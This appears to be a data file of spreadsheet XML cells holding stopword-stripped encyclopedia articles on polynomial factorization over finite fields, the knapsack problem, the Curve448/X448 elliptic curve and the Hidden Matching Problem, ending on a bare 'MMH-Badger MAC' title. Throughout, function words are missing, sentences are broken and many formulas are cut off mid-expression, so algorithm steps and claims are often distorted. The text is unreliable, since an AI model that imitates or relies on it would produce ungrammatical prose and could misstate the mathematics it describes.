remaining factors using recursion note factors multiplicity divisible c1/p r·sff(c)p output(r) idea identify product irreducible factors multiplicity. this done steps. first step uses formal derivative find factors multiplicity divisible second step identifies remaining factors. remaining factors multiplicity divisible meaning powers simply take p-th square root apply recursion. example square-free factorization {\displaystyle f=x^{11}+2x^{9}+2x^{8}+x^{6}+x^{5}+2x^{3}+2x^{2}+1\in \mathbf _{3}[x],} factored field three elements. algorithm computes first {\displaystyle c=\gcd(f,f')=x^{9}+2x^{6}+x^{3}+2.} since derivative non-zero enter loop. after loop updates x2+x+1. second time loop gives updates third time loop also change fourth time loop 1)(x 2)4, updates since exit loop. since must perfect cube. cube root obtained replacing calling square-free procedure recursively determines square-free. therefore, cubing combining value point gives square-free decomposition {\displaystyle f=(x+1)(x^{2}+1)^{3}(x+2)^{4}.} distinct-degree factorization this algorithm splits square-free polynomial product polynomials whose irreducible factors degree. fq[x] degree polynomial factored. algorithm distinct-degree factorization(ddf) input: monic square-free polynomial fq[x] output: pairs irreducible factor degree product monic irreducible factors degree begin {\displaystyle i:=1;\qquad s:=\emptyset ,\qquad f^{*}:=f;} {\displaystyle \deg f^{*}\geq {\displaystyle g=\gcd(f^{*},x^{q^{i}}-x)} {\displaystyle s:=s\cup \{(g,i)\}} {\displaystyle f^{*}:=f^{*}/g} while; {\displaystyle f^{*}\neq {\displaystyle s:=s\cup \{(f^{*},\deg f^{*})\}} {\displaystyle s=\emptyset return {(f, 1)}, else return correctness algorithm based following: lemma. polynomial {\displaystyle x^{q^{i}}-x\in \mathbf _{q}[x]} product monic irreducible polynomials fq[x] whose degree divides first glance, efficient since involves computing polynomials degree exponential degree input polynomial. however {\displaystyle g=\gcd \left(f^{*},x^{q^{i}}-x\right)} replaced {\displaystyle g=\gcd \left(f^{*},\left(x^{q^{i}}-x\mod f^{*}\right)\right).} therefore, compute: {\displaystyle x^{q^{i}}-x\mod f^{*},} methods: method start value {\displaystyle x^{q^{i-1}}\mod f^{*}} computed preceding step compute q-th power modulo using exponentiation squaring method. this needs {\displaystyle o\left(\log(q)\deg(f)^{2}\right)} arithmetic operations step, thus {\displaystyle o\left(\log(q)\deg(f)^{3}\right)} arithmetic operations whole algorithm. method using fact q-th power linear compute matrix {\displaystyle o\left(\deg(f)^{2}(\log(q)+\deg(f))\right)} operations. then iteration loop, compute product matrix vector (with o(deg(f)2) operations). this induces total number operations {\displaystyle o\left(\deg(f)^{2}(\log(q)+\deg(f))\right).} thus second method efficient usually preferred. moreover, matrix computed method used, algorithms, equal-degree factorization (see below); thus using distinct-degree factorization saves computing time. equal-degree factorization cantor–zassenhaus algorithm section, consider factorization monic squarefree univariate polynomial degree finite field pairwise distinct irreducible factors {\displaystyle f_{1},\ldots ,f_{r}} degree first describe algorithm cantor zassenhaus (1981) variant slightly better complexity. both probabilistic algorithms whose running time depends random choices (las vegas algorithms), good average running time. next section describe algorithm shoup (1990), also equal-degree factorization algorithm, deterministic. algorithms require order field coefficients. factorization algorithms e.g. knuth's book computer programming volume algorithm cantor–zassenhaus algorithm. input: finite field order monic square free polynomial fq[x] degree irreducible factors degree output: monic irreducible factors factors {f}; size(factors) choose fq[x] deg(h) random; {\displaystyle g:=h^{\frac {q^{d}-1}{2}}-1{\pmod {f}}} factors deg(u) gcd(g, gcd(g, factors:= factors {\displaystyle \,\setminus \,\{u\}\cup \{(\gcd(g,u),u/\gcd(g,u))\}} endif; endwhile return factors. correctness algorithm relies fact ring fq[x]/f direct product fields fq[x]/fi runs irreducible factors fields elements, component fields zero probability {\displaystyle {\frac {q^{d}-1}{2q^{d}}}\sim {\tfrac {1}{2}}.} this implies polynomial gcd(g, product factors component zero. shown average number iterations loop algorithm less {\displaystyle 2.5\log _{2}r} giving average number arithmetic operations {\displaystyle o(dn^{2}\log(r)\log(q))} typical case dlog(q) complexity reduced {\displaystyle o(n^{2}(\log(r)\log(q)+n))} choosing kernel linear {\displaystyle v\to v^{q}-v{\pmod {f}}} replacing instruction {\displaystyle g:=h^{\frac {q^{d}-1}{2}}-1{\pmod {f}}} {\displaystyle g:=h^{\frac {q-1}{2}}-1{\pmod {f}}.} proof validity above, replacing direct product fields fq[x]/fi direct product subfields elements. complexity decomposed {\displaystyle o(n^{2}\log(r)\log(q))} algorithm itself, {\displaystyle o(n^{2}(\log(q)+n))} computation matrix linear (which already computed square-free factorization) o(n3) computing kernel. noted algorithm works also factors degree case number factors, needed stopping loop, found dimension kernel). nevertheless, complexity slightly better square-free factorization done using algorithm decrease square-free factorization, reduces complexity critical steps). victor shoup's algorithm like algorithms preceding section, victor shoup's algorithm equal-degree factorization algorithm. unlike them, deterministic algorithm. however, less efficient, practice, algorithms preceding section. shoup's algorithm, input restricted polynomials prime fields worst case time complexity shoup's algorithm factor {\displaystyle {\sqrt {p}}.} although exponential, complexity much better previous deterministic algorithms (berlekamp's algorithm) factor. however, polynomials computing time exponential, average time complexity algorithm polynomial {\displaystyle d\log(p),} degree polynomial, number elements ground field. desired factorization, distinct monic irreducible polynomials degree deg(g) consider ring fq[x]/g denote also image ring direct product fields fq[x]/gi, denote natural homomorphism onto galois group cyclic order generated field automorphism follows roots {\displaystyle p_{i}(x),p_{i}(x^{q}),p_{i}\left(x^{q^{2}}\right),\ldots ,p_{i}\left(x^{q^{d-1}}\right).} like preceding algorithm, algorithm uses subalgebra berlekamp's algorithm, sometimes called "berlekamp subagebra" defined {\displaystyle {\begin{aligned}b&amp;=\left\{\alpha p_{1}(\alpha ),\cdots ,p_{k}(\alpha )\in \mathbf _{q}\right\}\\&amp;=\{u\in u^{q}=u\}\end{aligned}}} subset said separating every exists {\displaystyle p_{i}(s)\neq p_{j}(s)} preceding algorithm, separating constructed choosing random elements shoup's algorithm, separating constructed following way. r[y] {\displaystyle {\begin{aligned}s&amp;=(y-x)\left(y-x^{q}\right)\cdots \left(y-x^{q^{d-1}}\right)\\&amp;=s_{0}+\cdots +s_{d-1}y^{d-1}+y^{d}\end{aligned}}} then {\displaystyle \{s_{0},\dots ,s_{d-1}\}} separating {\displaystyle p_{i}(s)=g_{i}} ..., (the monic polynomials roots). pairwise distinct, every pair distinct indexes least coefficients satisfy {\displaystyle p_{i}(s_{h})\neq p_{j}(s_{h}).} having separating set, shoup's algorithm proceeds last algorithm preceding section, simply replacing instruction "choose random kernel linear {\displaystyle v\to v^{q}-v{\pmod {f}}} "choose ..., k−1}". time complexity described previous sections, factorization finite fields, randomized algorithms polynomial time complexity (for example cantor-zassenhaus algorithm). there also deterministic algorithms polynomial average complexity (for example shoup's algorithm). existence deterministic algorithm polynomial worst-case complexity still open problem. rabin's test irreducibility like distinct-degree factorization algorithm, rabin's algorithm based lemma stated above. distinct-degree factorization algorithm tests every greater half degree input polynomial. rabin's algorithm takes advantage factors needed considering fewer otherwise, similar distinct-degree factorization algorithm. based following fact. ..., prime divisors denote {\displaystyle n/p_{i}=n_{i}} polynomial fq[x] degree irreducible fq[x] {\displaystyle \gcd \left(f,x^{q^{n_{i}}}-x\right)=1} divides {\displaystyle x^{q^{n}}-x} fact, factor degree dividing divide {\displaystyle x^{q^{n}}-x} factor degree dividing factor divides least {\displaystyle x^{q^{n_{i}}}-x.} algorithm rabin irreducibility test input: monic polynomial fq[x] degree ..., distinct prime divisors output: either irreducible" reducible". {\displaystyle n_{j}=n/p_{j}} {\displaystyle h:=x^{q^{n_{i}}}-x{\bmod {f}}} gcd(f, return reducible" stop; for; {\displaystyle g:=x^{q^{n}}-x{\bmod {f}}} return irreducible", else return reducible" basic idea algorithm compute {\displaystyle x^{q^{n_{i}}}{\bmod {f}}} starting smallest {\displaystyle n_{1},\ldots ,n_{k}} repeated squaring using frobenius automorphism, take correspondent gcd. using elementary polynomial arithmetic, computation matrix frobenius automorphism needs {\displaystyle o(n^{2}(n+\log q))} operations computation {\displaystyle x^{q^{n_{i}}}-x{\pmod {f}}} needs o(n3) operations, algorithm needs o(kn2) operations, giving total {\displaystyle o(n^{2}(n+\log q))} operations using fast arithmetic (complexity {\displaystyle o(n\log multiplication division, {\displaystyle o(n(\log n)^{2})} computation), computation {\displaystyle x^{q^{n_{i}}}-x{\bmod {f}}} repeated squaring {\displaystyle o(n^{2}\log n\log algorithm {\displaystyle o(kn(\log n)^{2})} giving total {\displaystyle o(n^{2}\log n\log operations also berlekamp's algorithm cantor–zassenhaus algorithm polynomial factorization references notes external links some irreducible polynomials http://www.math.umn.edu/~garrett/m/algebra/notes/07.pdf field galois theory :http://www.jmilne.org/math/coursenotes/ft.pdf galois field:http://designtheory.org/library/encyc/topics/gf.pdf factoring polynomials finite fields: http://www.science.unitn.it/~degraaf/compalg/polfact.pdf</t>
  </si>
  <si>
    <t>Knapsack problem</t>
  </si>
  <si>
    <t>knapsack problem problem combinatorial optimization: given items, weight value, determine number item include collection total weight less equal given limit total value large possible. derives name problem faced someone constrained fixed-size knapsack must fill valuable items. problem often arises resource allocation decision-makers choose non-divisible projects tasks fixed budget time constraint, respectively. knapsack problem studied century, early works dating back 1897. name "knapsack problem" dates back early works mathematician tobias dantzig (1884–1956), refers commonplace problem packing valuable useful items without overloading luggage. applications knapsack problems appear real-world decision-making processes wide variety fields, finding least wasteful materials, selection investments portfolios, selection assets asset-backed securitization, generating keys merkle–hellman knapsack cryptosystems. early application knapsack algorithms construction scoring tests test-takers choice questions answer. small examples, fairly simple process provide test-takers choice. example, exam contains questions worth points, test-taker need answer questions achieve maximum possible score points. however, tests heterogeneous distribution point values, difficult provide choices. feuerman weiss proposed system students given heterogeneous test total possible points. students asked answer questions best abilities. possible subsets problems whose total point values 100, knapsack algorithm would determine subset gives student highest possible score.a 1999 study stony brook university algorithm repository showed that, algorithmic problems, knapsack problem 19th popular third needed suffix trees packing problem. definition common problem solved knapsack problem, restricts number {\displaystyle x_{i}} copies kind item zero one. given {\displaystyle items numbered {\displaystyle weight {\displaystyle w_{i}} value {\displaystyle v_{i}} along maximum weight capacity {\displaystyle maximize {\displaystyle \sum _{i=1}^{n}v_{i}x_{i}} subject {\displaystyle \sum _{i=1}^{n}w_{i}x_{i}\leq {\displaystyle x_{i}\in \{0,1\}} .here {\displaystyle x_{i}} represents number instances item {\displaystyle include knapsack. informally, problem maximize values items knapsack weights less equal knapsack's capacity. bounded knapsack problem (bkp) removes restriction item, restricts number {\displaystyle x_{i}} copies kind item maximum non-negative integer value {\displaystyle maximize {\displaystyle \sum _{i=1}^{n}v_{i}x_{i}} subject {\displaystyle \sum _{i=1}^{n}w_{i}x_{i}\leq {\displaystyle x_{i}\in \{0,1,2,\dots ,c\}.} unbounded knapsack problem (ukp) places upper bound number copies kind item formulated except restriction {\displaystyle x_{i}} non-negative integer. maximize {\displaystyle \sum _{i=1}^{n}v_{i}x_{i}} subject {\displaystyle \sum _{i=1}^{n}w_{i}x_{i}\leq {\displaystyle x_{i}\in \mathbb example unbounded knapsack problem given using figure shown beginning article text number available" caption figure. computational complexity knapsack problem interesting perspective computer science many reasons: decision problem form knapsack problem (can value least achieved without exceeding weight np-complete, thus known algorithm correct fast (polynomial-time) cases. while decision problem np-complete, optimization problem not, resolution least difficult decision problem, known polynomial algorithm tell, given solution, whether optimal (which would mean solution larger thus solving np-complete decision problem). there pseudo-polynomial time algorithm using dynamic programming. there fully polynomial-time approximation scheme, uses pseudo-polynomial time algorithm subroutine, described below. many cases arise practice, "random instances" distributions, nonetheless solved exactly.there link "decision" "optimization" problems exists polynomial algorithm solves "decision" problem, find maximum value optimization problem polynomial time applying algorithm iteratively increasing value hand, algorithm finds optimal value optimization problem polynomial time, decision problem solved polynomial time comparing value solution output algorithm value thus, versions problem similar difficulty. theme research literature identify "hard" instances knapsack problem look like, viewed another way, identify properties instances practice might make amenable worst-case np-complete behaviour suggests. goal finding "hard" instances public cryptography systems, merkle-hellman knapsack cryptosystem. furthermore, notable fact hardness knapsack problem depends form input. weights profits given integers, weakly np-complete, strongly np-complete weights profits given rational numbers. however, case rational weights profits still admits fully polynomial-time approximation scheme. solving several algorithms available solve knapsack problems, based dynamic programming approach, branch bound approach hybridizations approaches. dynamic programming in-advance algorithm unbounded knapsack problem (ukp) places restriction number copies kind item. besides, assume {\displaystyle x_{i}&gt;0} {\displaystyle m[w']=\max \left(\sum _{i=1}^{n}v_{i}x_{i}\right)} subject {\displaystyle \sum _{i=1}^{n}w_{i}x_{i}\leq {\displaystyle x_{i}&gt;0} observe {\displaystyle m[w]} following properties: {\displaystyle m[0]=0\,\!} (the zero items, i.e., summation empty set). {\displaystyle m[w]=\max(v_{1}+m[w-w_{1}],v_{2}+m[w-w_{2}],...,v_{n}+m[w-w_{n}])} {\displaystyle w_{i}\leq {\displaystyle v_{i}} value {\displaystyle kind item. second property needs explained detail. during process running method, weight {\displaystyle there {\displaystyle ways previous weights {\displaystyle w-w_{1},w-w_{2},...,w-w_{i}} total {\displaystyle kinds different item saying different, mean weight value completely same). know value {\displaystyle items related maximum value previously, compare maximum value ultimately done. here maximum empty taken zero. tabulating results {\displaystyle m[0]} {\displaystyle m[w]} gives solution. since calculation {\displaystyle m[w]} involves examining {\displaystyle items, {\displaystyle values {\displaystyle m[w]} calculate, running time dynamic programming solution {\displaystyle o(nw)} dividing {\displaystyle w_{1},\,w_{2},\,\ldots ,\,w_{n},\,w} greatest common divisor improve running time. even p≠np, {\displaystyle o(nw)} complexity contradict fact knapsack problem np-complete, since {\displaystyle unlike {\displaystyle polynomial length input problem. length {\displaystyle input problem proportional number bits {\displaystyle {\displaystyle \log {\displaystyle itself. however, since runtime pseudopolynomial, makes (decision version the) knapsack problem weakly np-complete problem. knapsack problem similar dynamic programming solution knapsack problem also runs pseudo-polynomial time. assume {\displaystyle w_{1},\,w_{2},\,\ldots ,\,w_{n},\,w} strictly positive integers. define {\displaystyle m[i,w]} maximum value attained weight less equal {\displaystyle using items {\displaystyle (first {\displaystyle items). define {\displaystyle m[i,w]} recursively follows: (definition {\displaystyle m[0,\,w]=0} {\displaystyle m[i,\,w]=m[i-1,\,w]} {\displaystyle w_{i}&gt;w\,\!} (the item current weight limit) {\displaystyle m[i,\,w]=\max(m[i-1,\,w],\,m[i-1,w-w_{i}]+v_{i})} {\displaystyle w_{i}\leqslant .the solution found calculating {\displaystyle m[n,w]} efficiently, table store previous computations. following pseudocode dynamic program: this solution therefore {\displaystyle o(nw)} time {\displaystyle o(nw)} space. need value m[n,w], modify code amount memory required o(w) stores recent lines array "m".) however, take step further, know method time {\displaystyle o(nw)} {\displaystyle o(2^{n})} from definition know need compute weights number items items chose fixed. that say, program computes necessary weight changes often. from perspective, program method runs recursively. example, different items weight limit {\displaystyle {\begin{aligned}&amp;w[1]=23,w[2]=26,w[3]=20,w[4]=18,w[5]=32,w[6]=27,w[7]=29,w[8]=26,w[9]=30,w[10]=27\\&amp;v[1]=505,v[2]=352,v[3]=458,v[4]=220,v[5]=354,v[6]=414,v[7]=498,v[8]=545,v[9]=473,v[10]=543\\\end{aligned}}} method compute {\displaystyle m(10,67)} this, excluding calls produce {\displaystyle m(i,j)=0} 1270 1270 1270 1183 1183 1183 1183 {\displaystyle {\begin{aligned}&amp;m(10,67)=1270\\&amp;m(9,67)=1270,m(9,40)=678\\&amp;m(8,67)=1270,m(8,40)=678,m(8,37)=545\\&amp;m(7,67)=1183,m(7,41)=725,m(7,40)=678,m(7,37)=505\\&amp;m(6,67)=1183,m(6,41)=725,m(6,40)=678,m(6,38)=678,m(6,37)=505\\&amp;m(5,67)=1183,m(5,41)=725,m(5,40)=678,m(5,38)=678,m(5,37)=505\\&amp;m(4,67)=1183,m(4,41)=725,m(4,40)=678,m(4,38)=678,m(4,37)=505,m(4,35)=505\\&amp;m(3,67)=963,m(3,49)=963,m(3,41)=505,m(3,40)=505,m(3,38)=505,m(3,37)=505,m(3,35)=505,m(3,23)=505,m(3,22)=458,m(3,20)=458\\&amp;m(2,67)=857,m(2,49)=857,m(2,47)=505,m(2,41)=505,m(2,40)=505,m(2,38)=505,m(2,37)=505,m(2,35)=505,m(2,29)=505,m(2,23)=505\\&amp;m(1,67)=505,m(1,49)=505,m(1,47)=505,m(1,41)=505,m(1,40)=505,m(1,38)=505,m(1,37)=505,m(1,35)=505,m(1,29)=505,m(1,23)=505\\\end{aligned}}} besides, break recursion convert tree. then leaves parallel computing expedite running method. find actual subset items, rather total value, running function above: meet-in-the-middle another algorithm knapsack, discovered 1974 sometimes called "meet-in-the-middle" parallels similarly named algorithm cryptography, exponential number different items preferable algorithm {\displaystyle large compared particular, {\displaystyle w_{i}} nonnegative integers, could still dynamic programming algorithm scaling rounding (i.e. using fixed-point arithmetic), problem requires {\displaystyle fractional digits precision arrive correct answer, {\displaystyle need scaled {\displaystyle 10^{d}} algorithm require {\displaystyle o(w10^{d})} space {\displaystyle o(nw10^{d})} time. algorithm meet-in-the-middle input: items weights values. output: greatest combined value subset. partition {1...n} sets approximately equal size compute weights values subsets subset find subset greatest value combined weight less keep track greatest combined value seen algorithm takes {\displaystyle o(2^{n/2})} space, efficient implementations step (for instance, sorting subsets weight, discarding subsets weigh subsets greater equal value, using binary search find best match) result runtime {\displaystyle o(n2^{n/2})} meet middle attack cryptography, improves {\displaystyle o(n2^{n})} runtime naive brute force approach (examining subsets 1... {\displaystyle \{1...n\}} cost using exponential rather constant space (see also baby-step giant-step). approximation algorithms np-complete problems, enough find workable solutions even optimal. preferably, however, approximation comes guarantee difference value solution found value optimal solution. many useful computationally complex algorithms, substantial research creating analyzing algorithms approximate solution. knapsack problem, though np-hard, collection algorithms still approximated specified degree. this means problem polynomial time approximation scheme. exact, knapsack problem fully polynomial time approximation scheme (fptas). greedy approximation algorithm george dantzig proposed greedy approximation algorithm solve unbounded knapsack problem. version sorts items decreasing order value unit weight, {\displaystyle v_{1}/w_{1}\geq \cdots \geq v_{n}/w_{n}} proceeds insert sack, starting many copies possible first kind item longer space sack more. provided unlimited supply kind item, {\displaystyle maximum value items sack, greedy algorithm guaranteed achieve least value {\displaystyle m/2} bounded problem, supply kind item limited, algorithm optimal. nevertheless, simple modification allows solve case: assume simplicity items individually sack {\displaystyle w_{i}\leq {\displaystyle construct solution {\displaystyle s_{1}} packing items greedily long possible, i.e. {\displaystyle s_{1}=\left\{1,\ldots ,k\right\}} {\displaystyle k=\textstyle \max _{1\leq k'\leq n}\textstyle \sum _{i=1}^{k'}w_{i}\leq furthermore, construct second solution {\displaystyle s_{2}=\left\{k+1\right\}} containing first item fit. since {\displaystyle s_{1}\cup s_{2}} provides upper bound relaxation problem, sets must value least {\displaystyle m/2} thus return whichever {\displaystyle s_{1}} {\displaystyle s_{2}} better value obtain {\displaystyle 1/2} -approximation. shown average performance converges optimal solution distribution error rate {\displaystyle n^{-1/2}} fully polynomial time approximation scheme fully polynomial time approximation scheme (fptas) knapsack problem takes advantage fact reason problem known polynomial time solutions profits associated items restricted. rounds least significant digits profit values bounded polynomial bound correctness solution. this restriction means algorithm find solution polynomial time correct within factor (1-ε) optimal solution. algorithm fptas input: (0,1] list items, specified values, {\displaystyle v_{i}} weights output: fptas solution {\displaystyle \{v_{i}\mid 1\leq i\leq n\}} highest item value {\displaystyle {\frac {p}{n}}} {\displaystyle v'_{i}} {\displaystyle \left\lfloor {\frac {v_{i}}{k}}\right\rfloor return solution, using {\displaystyle v'_{i}} values dynamic program outlined theorem: {\displaystyle computed algorithm satisfies {\displaystyle \mathrm {profit} (s')\geq (1-\varepsilon )\cdot \mathrm {profit} (s^{*})} {\displaystyle s^{*}} optimal solution. dominance relations solving unbounded knapsack problem made easier throwing away items never needed. given item {\displaystyle suppose could find items {\displaystyle total weight less weight {\displaystyle total value greater value {\displaystyle then {\displaystyle cannot appear optimal solution, could always improve potential solution containing {\displaystyle replacing {\displaystyle {\displaystyle therefore, disregard {\displaystyle item altogether. cases, {\displaystyle said dominate {\displaystyle (note apply bounded knapsack problems, since already used items {\displaystyle finding dominance relations allows significantly reduce size search space. there several different types dominance relations, satisfy inequality form: {\displaystyle \qquad \sum _{j\in j}w_{j}\,x_{j}\ \leq \alpha \,w_{i}} {\displaystyle \sum _{j\in j}v_{j}\,x_{j}\ \geq \alpha \,v_{i}\,} {\displaystyle x\in z_{+}^{n}} {\displaystyle \alpha z_{+}\,,j\subsetneq {\displaystyle i\not vector {\displaystyle denotes number copies member {\displaystyle collective dominance {\displaystyle item collectively dominated {\displaystyle written {\displaystyle i\ll total weight combination items {\displaystyle less total value greater formally, {\displaystyle \sum _{j\in j}w_{j}\,x_{j}\ \leq w_{i}} {\displaystyle \sum _{j\in j}v_{j}\,x_{j}\ \geq v_{i}} {\displaystyle x\in z_{+}^{n}} i.e. {\displaystyle \alpha verifying dominance computationally hard, used dynamic programming approach. fact, equivalent solving smaller knapsack decision problem {\displaystyle v=v_{i}} {\displaystyle w=w_{i}} items restricted {\displaystyle threshold dominance {\displaystyle item threshold dominated {\displaystyle written {\displaystyle i\prec \prec number copies {\displaystyle dominated {\displaystyle formally, {\displaystyle \sum _{j\in j}w_{j}\,x_{j}\ \leq \alpha \,w_{i}} {\displaystyle \sum _{j\in j}v_{j}\,x_{j}\ \geq \alpha \,v_{i}\,} {\displaystyle x\in z_{+}^{n}} {\displaystyle \alpha \geq this generalization collective dominance, first introduced used eduk algorithm. smallest {\displaystyle \alpha defines threshold item {\displaystyle written {\displaystyle t_{i}=(\alpha -1)w_{i}} case, optimal solution could contain {\displaystyle \alpha copies {\displaystyle multiple dominance {\displaystyle item multiply dominated single item {\displaystyle written {\displaystyle i\ll _{m}j} {\displaystyle dominated number copies {\displaystyle formally, {\displaystyle w_{j}\,x_{j}\ \leq w_{i}} {\displaystyle v_{j}\,x_{j}\ \geq v_{i}} {\displaystyle x_{j}\in z_{+}} i.e. {\displaystyle j=\{j\},\alpha =1,x_{j}=\lfloor {\frac {w_{i}}{w_{j}}}\rfloor this dominance could efficiently used preprocessing detected relatively easily. modular dominance {\displaystyle best item, i.e. {\displaystyle {\frac {v_{b}}{w_{b}}}\geq {\frac {v_{i}}{w_{i}}}\,} {\displaystyle this item greatest density value. {\displaystyle item modularly dominated single item {\displaystyle written {\displaystyle i\ll _{\equiv {\displaystyle dominated {\displaystyle plus several copies {\displaystyle formally, {\displaystyle w_{j}+tw_{b}\leq w_{i}} {\displaystyle v_{j}+tv_{b}\geq v_{i}} i.e. {\displaystyle j=\{b,j\},\alpha =1,x_{b}=t,x_{j}=1} variations there many variations knapsack problem arisen vast number applications basic problem. main variations occur changing number problem parameter number items, number objectives, even number knapsacks. multi-objective knapsack problem this variation changes goal individual filling knapsack. instead objective, maximizing monetary profit, objective could several dimensions. example, could environmental social concerns well economic goals. problems frequently addressed include portfolio transportation logistics optimizations.as example, suppose cruise ship. decide many famous comedians hire. this boat handle passengers entertainers must weigh less 1000 lbs. each comedian weight, brings business based popularity asks specific salary. example, multiple objectives. want, course, maximize popularity entertainers minimizing salaries. also, want many entertainers possible. multi-dimensional knapsack problem variation, weight knapsack item {\displaystyle given d-dimensional vector {\displaystyle {\overline {w_{i}}}=(w_{i1},\ldots ,w_{id})} knapsack d-dimensional capacity vector {\displaystyle (w_{1},\ldots ,w_{d})} target maximize values items knapsack weights dimension {\displaystyle exceed {\displaystyle w_{d}} multi-dimensional knapsack computationally harder knapsack; even {\displaystyle d=2} problem eptas unless {\displaystyle however, algorithm shown solve sparse instances efficiently. instance multi-dimensional knapsack sparse {\displaystyle j=\{1,2,\ldots ,m\}} {\displaystyle m&lt;d} every knapsack item {\displaystyle {\displaystyle \exists z&gt;m} {\displaystyle \forall j\in j\cup \{z\},\ w_{ij}\geq {\displaystyle \forall y\notin j\cup \{z\},w_{iy}=0} such instances occur, example, scheduling packets wireless network relay nodes. algorithm also solves sparse instances multiple choice variant, multiple-choice multi-dimensional knapsack. (increasing height shelf) algorithm optimal knapsack (packing squares two-dimensional unit size square): five square optimal packing. multiple knapsack problem this variation similar packing problem. differs packing problem subset items selected, whereas, packing problem, items packed certain bins. concept multiple knapsacks. this seem like trivial change, equivalent adding capacity initial knapsack. this variation used many loading scheduling problems operations research polynomial-time approximation scheme. quadratic knapsack problem quadratic knapsack problem maximizes quadratic objective function subject binary linear capacity constraints. problem introduced gallo, hammer, simeone 1980, however first treatment problem dates back witzgall 1975. subset-sum problem subset problem special case decision problems kind item, weight equals value: {\displaystyle w_{i}=v_{i}} field cryptography, term knapsack problem often used refer specifically subset problem commonly known karp's np-complete problems.the generalization subset problem called multiple subset-sum problem, multiple bins exist capacity. shown generalization fptas. geometric knapsack problem geometric knapsack problem, rectangles different values, rectangular knapsack. goal pack largest possible value knapsack. also notes references garey, michael david johnson (1979). computers intractability: guide theory np-completeness. w.h. freeman. isbn 978-0-7167-1045-5. mp9, pg.247. kellerer, hans; pferschy, ulrich; pisinger, david (2004). knapsack problems. springer. doi:10.1007/978-3-540-24777-7. isbn 978-3-540-40286-2. 2161720. s2cid 28836720. martello, silvano; toth, paolo (1990). knapsack problems: algorithms computer implementations. wiley-interscience. isbn 978-0-471-92420-3. 1086874. external links free download book "knapsack problems: algorithms computer implementations", silvano martello paolo toth lecture slides knapsack problem pyasukp: another solver unbounded knapsack problem, code taking advantage dominance relations hybrid algorithm, benchmarks downloadable copies papers. home page david pisinger downloadable copies papers publication list (including "where hard knapsack problems?") knapsack problem solutions many languages rosetta code dynamic programming algorithm knapsack problem knapsack problem solver (online) solving 0-1-knapsack genetic algorithms ruby archived 2011 wayback machine codes quadratic knapsack problem optimizing three-dimensional packing knapsack integer programming solution python gekko (optimization software)</t>
  </si>
  <si>
    <t>X448</t>
  </si>
  <si>
    <t>cryptography, curve448 curve448-goldilocks elliptic curve potentially offering bits security designed elliptic-curve diffie–hellman (ecdh) agreement scheme. developed mike hamburg rambus cryptography research, curve448 allows fast performance compared proposed curves comparable security. reference implementation available license. curve favored internet research task force crypto forum research group (irtf cfrg) inclusion transport layer security (tls) standards along curve25519. 2017, nist announced curve25519 curve448 would added "special publication 800-186", specifies approved elliptic curves federal government. 2019 draft fips 186-5 confirms claim. both described 7748. name x448 used function. mathematical properties hamburg chose solinas trinomial prime base 2448 2224 calling "goldilocks" prime "because form defines golden ratio 2224". main advantage golden-ratio prime fast karatsuba multiplication.the curve hamburg used untwisted edwards curve 39081x2y2. constant −39081 chosen smallest absolute value required mathematical properties, thus nothing-up-my-sleeve number. curve448 constructed avoids many potential implementation pitfalls. also curve25519 poly1305 references</t>
  </si>
  <si>
    <t>Hidden Matching Problem</t>
  </si>
  <si>
    <t>hidden matching problem computation complexity problem solved using quantum protocols: {\displaystyle positive even integer. hidden matching problem, alice given {\displaystyle x\in \{0,1\}^{n}} given {\displaystyle m\in {\mathcal {m}}_{n}} {\displaystyle {\mathcal {m}}_{n}} denotes family possible perfect matchings {\displaystyle nodes). their goal output tuple {\displaystyle \langle i,j,b\rangle edge {\displaystyle (i,j)} belongs matching {\displaystyle {\displaystyle b=x_{i}\oplus x_{j}} used find quantum communication problems demonstrate super-polynomial advantage classical ones. background communication complexity model computation first introduced 1979. parties (normally called alice bob) hold piece data want solve computational task jointly depends data. alice knows information {\displaystyle knows information {\displaystyle want solve function {\displaystyle f(x,y)} order need communicate themselves, goal solve problem minimal communication obeying restrictions specific communication model. there communication models considered: one-way communication model alice sends single message give answer, based content message part input. interactive (two-way) communication model players interactively exchange messages till decides give answer, based communication transcript part input.communication tasks either functional, meaning exactly correct answer corresponding every possible input, relational, multiple correct answers allowed. history hidden matching problem first defined 2004 bar-yossef, jayram kerenidis. through definition, able provide first exponential separation quantum bounded-error randomized one-way communication complexity. they proved quantum one-way communication complexity hidden matching problem {\displaystyle {\mathcal {o}}(\log randomized one-way protocol bounded error must {\displaystyle \omega ({\sqrt {n}})} bits communication. hidden matching problem relational problem. paper, authors proposed boolean version problem, boolean hidden matching problem, conjectured quantum-classical holds well. this later proven true gavinsky al.in 2008, gavinsky improved bar-yossef al.’s result showing exponential separation one-way quantum communication two-way classical communication. applications hidden matching problem used basis gavinsky's 2012 quantum coin scheme. given coin payment goods services. this coin consists quantum register containing multiple qubits. wishes verify coin legitimate. classical scenario, digital coin made unique string classical bits, coin holder sends string bank bank compares static database valid strings. string exists database bank confirms coin valid. however, leaves potential adversary masquerade bank steal coin holder's coin pretence verifying using hidden matching problem, coin holder send relevant information bank bank verify coin legitimate adversary masquerading bank learn enough able reproduce coin. protocol provide values {\displaystyle (a_{i},b_{i})} bank. these values {\displaystyle (a_{i},b_{i})} attained measuring certain quantum registers coin. bank holds values {\displaystyle x_{i}} (the classical strings) {\displaystyle m_{i}} {\displaystyle \forall i\;(x_{i},m_{i},a_{i},b_{i})\in {\textit {hmp}}_{4}} bank verify fact hold valid coin corresponding classical values {\displaystyle x_{i}} {\displaystyle x\in \{0,1\}^{4}} {\displaystyle m,a,b\in \{0,1\}} {\displaystyle (x,m,a,b)\in {\textit {hmp}}_{4}} {\displaystyle b={\begin{cases}x_{1}\otimes x_{2+m},\quad {\text{if }}a=0\\x_{3-m}\otimes x_{4},\quad {\text{if }}a=1,\end{cases}}} {\displaystyle {\textit {hmp}}_{4}} refers four version hidden matching problem. references</t>
  </si>
  <si>
    <t>MMH-Badger MAC</t>
  </si>
  <si>
